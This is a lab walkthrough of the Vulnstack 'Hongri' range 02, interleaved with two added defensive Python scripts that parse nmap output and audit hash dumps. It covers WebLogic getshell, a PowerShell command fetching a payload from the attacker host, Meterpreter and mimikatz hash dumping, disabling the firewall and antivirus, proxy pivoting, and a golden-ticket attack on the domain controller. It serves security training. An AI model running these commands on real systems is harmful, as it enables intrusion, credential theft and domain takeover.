Hongri (Red Sun) Range 02
0. Environment setup
Range download address: http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
Default password: 1qaz@WSX
First get the IP addressing working.
The web service is not started by default: go to C:\Oracle\Middleware\user_projects\domains\base_domain\bin and, as Administrator, run the scripts there in turn.
I. External network
1. Port scan
nmap 192.168.111.80 -sT -Pn
nmap 192.168.111.201 -sT -Pn
nmap 192.168.111.80 --script vuln
root@kali:~# nmap --script vuln 192.168.111.80
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-05 05:14 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 192.168.111.80
Host is up (0.00016s latency).
Not shown: 990 filtered ports
PORT STATE SERVICE
80/tcp open http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1433/tcp open ms-sql-s
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_3DES_EDE_CBC_SHA
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.securityfocus.com/bid/70574
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_sslv2-drown:
|_tls-ticketbleed: ERROR: Script execution failed (use -d to debug)
3389/tcp open ms-wbt-server
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
49152/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49155/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:78:A0:52 (VMware)

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 156.64 seconds
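A scan like the one above is easier to act on as a remediation list than read by eye. The following triage parser is an added example, not code from the original write-up; its input is a constructed, trimmed copy of that output, and the parser also copes with the stripped indentation seen in the pasted scan.

```python
import re
# Constructed sample: a trimmed copy of the `--script vuln` output shown above.
SAMPLE_SCAN = """\
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ssl-poodle:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
"""

PORT_RE = re.compile(r"^(\d+/(?:tcp|udp))\s+\S+\s+\S+")
# NSE script names are lowercase (ssl-poodle); nested keys (State:, IDs:) are
# capitalised, so headers are recognised even if indentation was stripped.
SCRIPT_RE = re.compile(r"^\|_?\s*([a-z][a-z0-9_-]*):")
CVE_RE = re.compile(r"CVE-\d{4}-\d+")


def parse_vuln_findings(text):
    """Return one dict per NSE result whose State reports (LIKELY) VULNERABLE."""
    results, port, cur = [], "host", None
    for raw in text.splitlines():
        m = PORT_RE.match(raw)
        if m or raw.startswith("Host script results"):  # new port / host block
            port, cur = (m.group(1) if m else "host"), None
            continue
        if not raw.startswith("|"):  # scanner chatter, MAC line, etc.
            continue
        m = SCRIPT_RE.match(raw)
        if m:  # header of a new script result
            cur = {"port": port, "script": m.group(1), "state": "", "cves": [], "risk": ""}
            results.append(cur)
            continue
        if cur is None:
            continue
        body = raw.lstrip("|_ ").strip()
        if body.startswith("State:"):
            cur["state"] = body.split(":", 1)[1].strip()
        elif body.startswith("IDs:"):
            cur["cves"].extend(CVE_RE.findall(body))
        elif body.startswith("Risk factor:"):
            cur["risk"] = body.split(":", 1)[1].strip()
    return [r for r in results if "VULNERABLE" in r["state"]
            and not r["state"].startswith("NOT")]
```

Run against the full scan above it yields two actionable items: POODLE on 1433/tcp and ms17-010 at host level; everything else (script errors, "false", "NT_STATUS_ACCESS_DENIED") is dropped.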
Tried the usual ms17 combo; it failed.
use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.111.80
run
2. Directory scan
Nothing useful found.
gobuster dir -u http://192.168.111.80 -w /usr/share/wordlists/dirbuster/apache-user-enum-1.0.txt
3. WebLogic getshell
Visited the open ports one by one and found WebLogic on port 7001.
Common WebLogic port: 7001
WebLogic admin console login:
Browse to http://your-ip:7001/console to reach the console.
Searched online for the relevant vulnerabilities and exploit tools (script kiddie reporting for duty).
Vulnerability detection tool:
Using the exploit tool, command execution succeeded, but uploading a file did not work.
Used the getshell script to obtain a webshell.
Started a web server on Kali and had the web host download the payload from it:
powershell (new-object Net.WebClient).DownloadFile('http://192.168.111.128/r.exe','C:\1.exe')
4. Establish an MSF session
After uploading, run the trojan through the webshell.
Set up a listener in msf.
Session established.
5. Obtain hashes
Migrate process.
Load mimikatz (kiwi).
hashdump
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
de1ay:1000:aad3b435b51404eeaad3b435b51404ee:3b24c391862f4a8531a245a0217708c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
wdigest
6. Remote desktop connection
Enable remote desktop:
run post/windows/manage/enable_rdp
rdesktop 192.168.111.80
Turn off the firewall, Defender and 360.
7. Collect information on the pivot host
List installed applications:
run post/windows/gather/enum_applications
Get information on users who have logged on:
run post/windows/gather/enum_logged_on_users
II. Internal domain network
0. Gather internal network information
ifconfig
Found that the web host sits on an internal domain network, 10.10.10.0/24.
List domain members:
run post/windows/gather/enum_ad_computers
Locate the domain controller:
run post/windows/gather/enum_domain
Discover live hosts on the same segment.
Try to access the DC.
1. Set up routing and configure the proxy
run autoroute -s 10.10.10.0/24
Edit the proxychains.conf file.
Scan the DC (the scan takes a long time; other work can be done meanwhile):
nmap 10.10.10.10 -sT -Pn
If nmap errors out once the proxy is enabled, try editing proxychains.conf and commenting out proxy_dns.
2. Golden ticket attack
Try forging a golden ticket:
dcsync_ntlm krbtgt
[+] Account : krbtgt
[+] NTLM Hash : 82dfc71b72a11ef37d663047bc2088fb
[+] LM Hash : 9b5cd36575630d629f3aa6d769ec91c3
[+] SID : S-1-5-21-2756371121-2868759905-3853650604-502
[+] RID : 502
The first attempt failed (possibly because the domain in use at the time was de1ay); the second succeeded.
golden_ticket_create -d de1ay.com -u gui -s S-1-5-21-2756371121-2868759905-3853650604 -k 82dfc71b72a11ef37d663047bc2088fb -t /home/kali/Desktop/hongri.ticket
Imported the ticket and tried to access the DC; access failed:
CMD does not support UNC paths as current directories.
Cause and fix:
When you use cd to change into a UNC directory, you get the message "CMD does not support UNC paths as current directories.": cd can only move between local directories, not into a UNC path.
What then? Use the second command, pushd: "pushd unc_path" maps the UNC path to a local Z: drive, and after running it the next prompt is no longer C:> but Z:>, i.e. the UNC path has been mapped.
From then on the UNC directory can be used like a local one (a Z: drive mapping actually appears in "My Computer", equivalent to a local disk). As shown in the figure, cd, dir and so on all work.
net use k: \\dc\c$ /user:administrator
Executed successfully.
Logged in to the web host via remote desktop to continue.
3. Upload the trojan
Build a bind (forward-connect) payload:
msfvenom -p windows/meterpreter/bind_tcp lport=13777 -f exe > /root/d.exe
Kali --> Web:
upload /root/d.exe c:\d.exe
Web --> DC:
Over remote desktop, copy the trojan onto the mapped DC drive.
Set up a listener in msf.
At first I assumed that running the trojan from the mapped drive K: would give me a DC session. I waited in the msf window for a long time without any connection coming in, until I tried changing rhost to the web host and got a session immediately; only then did I realise how naive that idea had been. Mapping a network drive (disk mapping) shares a folder over the LAN, but it is only the folder that is shared; the program still runs on the local machine.
4. Forward connection
Tried ms17_010_command.
Tried running the trojan.
Connection established.
5. Obtain hashes
Migrate process.
Load mimikatz (kiwi).
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e7114141b0337bdce1aedf5594706205:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:82dfc71b72a11ef37d663047bc2088fb:::
de1ay:1001:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
mssql:2103:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
DC$:1002:aad3b435b51404eeaad3b435b51404ee:58743e6c5e776a472e3bd957b96eaabb:::
PC$:1105:aad3b435b51404eeaad3b435b51404ee:e27bd7933be6ce598658108e424e5a2a:::
WEB$:1603:aad3b435b51404eeaad3b435b51404ee:c4b073b9fda2d93be9c6af076d2bdf52:::
wdigest
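The two hashdump listings above (web host and DC) show what an audit of such a dump should flag. The script below is an added example, not code from the original write-up; the two samples are constructed copies of those listings. It reports empty-password accounts, LM hashes still being stored, password reuse across accounts (de1ay and mssql share an NT hash above) and the built-in high-value RIDs.

```python
# NT hash of the empty password; the LM value below means LM storage is off.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
HIGH_VALUE_RIDS = {500: "built-in Administrator", 502: "krbtgt (signs every TGT)"}

# Constructed samples copied from the two hashdump listings above.
WEB_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
de1ay:1000:aad3b435b51404eeaad3b435b51404ee:3b24c391862f4a8531a245a0217708c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""
DC_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e7114141b0337bdce1aedf5594706205:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:82dfc71b72a11ef37d663047bc2088fb:::
de1ay:1001:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
mssql:2103:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
WEB$:1603:aad3b435b51404eeaad3b435b51404ee:c4b073b9fda2d93be9c6af076d2bdf52:::
"""


def parse_hashdump(text):
    """Parse user:rid:lmhash:nthash::: rows; skips prompts, blanks and mangled lines."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit() or len(parts[3]) != 32:
            continue
        rows.append({"user": parts[0], "rid": int(parts[1]),
                     "lm": parts[2].lower(), "nt": parts[3].lower()})
    return rows


def audit_hashdump(text):
    """Return (account, issue) pairs a defender should act on."""
    rows, issues, by_nt = parse_hashdump(text), [], {}
    for r in rows:
        by_nt.setdefault(r["nt"], []).append(r["user"])
        # Guest normally has the empty hash but is disabled; hashdump does not
        # show the disabled flag, so check it before treating this as a finding.
        if r["nt"] == EMPTY_NT and not r["user"].endswith("$"):
            issues.append((r["user"], "empty password"))
        if r["lm"] != EMPTY_LM:
            issues.append((r["user"], "LM hash stored"))
        if r["rid"] in HIGH_VALUE_RIDS:
            issues.append((r["user"], "high-value: " + HIGH_VALUE_RIDS[r["rid"]]))
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:  # same NT hash => same password
            issues.append((",".join(users), "password reuse"))
    return issues
```

On the web host dump it flags the local Administrator as having an empty password; on the DC dump it flags krbtgt as high-value and de1ay/mssql as sharing a password, while the garbled DC$ line from the raw paste would simply be skipped.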
6. Remote desktop
Enable remote desktop:
run post/windows/manage/enable_rdp
Error:
Failed to connect, CredSSP required by server (check if server has disabled old TLS versions, if yes use -V option).
Cause: this option was ticked: "Allow connections only from computers running Remote Desktop with Network Level Authentication (recommended)".
Fix:
Connect with remmina instead (not actually tried):
apt install remmina